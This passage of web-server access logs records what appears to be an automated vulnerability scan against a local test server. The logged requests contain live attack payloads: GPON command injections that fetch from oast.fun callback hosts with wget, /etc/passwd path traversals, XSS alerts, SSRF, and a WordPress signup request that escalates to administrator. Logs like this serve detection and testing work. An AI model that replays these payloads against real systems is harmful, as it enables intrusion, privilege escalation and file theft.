HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.231","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /external_content/retrieve/oembed?endpoint=http://c9v8h8gsmpv8c1qg07h0uji5ujyu7wfnt.oast.fun&url=foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.222","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/publish.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /store/app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://c9v8h88smpv8c1ig07h0p94hme87jhrms.oast.fun`;busybox wget http://c9v8h88smpv8c1ig07h05gk7neyd4oba1.oast.fun&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"{\x22type\x22:\x22index\x22,\x22spec\x22:{\x22type\x22:\x22index\x22,\x22ioConfig\x22:{\x22type\x22:\x22index\x22,\x22firehose\x22:{\x22type\x22:\x22http\x22,\x22uris\x22:[\x22 file:///etc/passwd \x22]}},\x22dataSchema\x22:{\x22dataSource\x22:\x22sample\x22,\x22parser\x22:{\x22type\x22:\x22string\x22, \x22parseSpec\x22:{\x22format\x22:\x22regex\x22,\x22pattern\x22:\x22(.*)\x22,\x22columns\x22:[\x22a\x22],\x22dimensionsSpec\x22:{},\x22timestampSpec\x22:{\x22column\x22:\x22no_ such_ column\x22,\x22missingValue\x22:\x222010-01-01T00:00:00Z\x22}}}}},\x22samplerConfig\x22:{\x22numRows\x22:500,\x22timeoutMs\x22:15000}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler?for=connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/deploy.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_username\x22\x0D\x0A\x0D\x0A297MTvB7xrJWJmIyhvbH31NugHN\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_email\x22\x0D\x0A\x0D\x0A297MTvB7xrJWJmIyhvbH31NugHN@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password\x22\x0D\x0A\x0D\x0A297MTvB7xrJWJmIyhvbH31NugHN@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_password_present\x22\x0D\x0A\x0D\x0Atrue\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_first_name\x22\x0D\x0A\x0D\x0A297MTvB7xrJWJmIyhvbH31NugHN@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22reg_last_name\x22\x0D\x0A\x0D\x0A297MTvB7xrJWJmIyhvbH31NugHN@example.com\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp/?page_id=18\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22pp_current_url\x22\x0D\x0A\x0D\x0Ahttp://127.0.0.1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22wp_capabilities[administrator]\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_form_id\x22\x0D\x0A\x0D\x0A1\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22signup_referrer_page\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0App_ajax_signup\x0D\x0A-----------------------------138742543134772812001999326589\x0D\x0AContent-Disposition: form-data; name=\x22melange_id\x22\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------138742543134772812001999326589--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"{\x22email\x22:\x22invalid\x22,\x22signUpContext\x22:{},\x22secondaryEmail\x22:\x22\x22,\x22usingNewUi\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servicedesk/customer/user/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.237","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://c9v8h88smpv8c1ig07h0dj8sp5jicd6a8.oast.fun`;wget http://c9v8h88smpv8c1ig07h0eiyied4jwhs79.oast.fun&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"log=297MTvB7xrJWJmIyhvbH31NugHN@example.com&pwd=297MTvB7xrJWJmIyhvbH31NugHN@example.com&wp-submit=Log+In","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/registry-clients HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/lint.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rootDesc.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxwebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.241","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/61 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.245","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.233","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /counters HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/coverage.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filezilla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concerto/Login?goto=Central HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.231","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/62 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /flow/registries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.236","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/data/usrimg/297mtqpsgiw2ucq7qod8jhuindu.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.223","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 